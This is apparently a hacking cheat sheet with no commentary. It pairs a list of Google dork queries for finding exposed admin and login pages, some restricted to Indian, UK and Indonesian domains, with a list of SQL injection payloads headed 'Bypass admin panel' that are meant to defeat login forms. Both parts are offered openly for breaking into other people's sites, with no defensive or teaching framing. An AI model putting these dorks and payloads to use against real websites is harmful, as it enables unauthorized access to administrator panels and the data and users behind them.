Dorks:
inurl:admin/index.php
 inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:adminlogin.aspx
inurl:/admin site:in
inurl:/admin site:in
inurl:/panel/index.php
intitle:"administrator" 
inurl:/administrator site:uk
inurl:/login.php site:in
inurl:/admin/logout.php 
inurl:/adminpanel/login.php 
inurl:/login site:in 
inurl:/panel/login.html 
inurl:/admin/login.html 
inurl:/administrator/login.html 
inurl:/adminpanel/login.html 
inurl: /login/login.html 
inurl:/admin/add.php 
inurl:/admin/images/files 
site:id /login 
site:in /admin/add_gallery.php 
site:in /admin/ addgallery.php 
site:in /banner.php 
site:in /admin/banner.php 
inurl:/login/login/login/login.php 
inurl:/home/admin/index.php 
inurl: /blog/admin/index.php php 
inurl:/admin/admin.php 
inurl:/admin/.php 
inurl:/panel/home.php 
inurl: /admin/home.php 
inurl:/administrator/home.php 
inurl:/admin/home1.php
intitle:"dashboard" 
inurl:/admin 
intitle:"dashboard" 
inurl:/login 
intitle:"dashboard"
inurl://administrator




🔆 Bypass admin panel

 'or''='

or''='@gmail.com

'="or'

'="or'@gmail.com

or " "=" " 
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
' or 1=1 limit 1 -- -+
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
") or true--
' or true--
') or true--
' or 'x'='x
') or ('x')=('x
" or "x"="x
") or ("x")=("x
1=1 or 1=1--
or 1=1#
or 1=1/*
admin' --
admin" --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
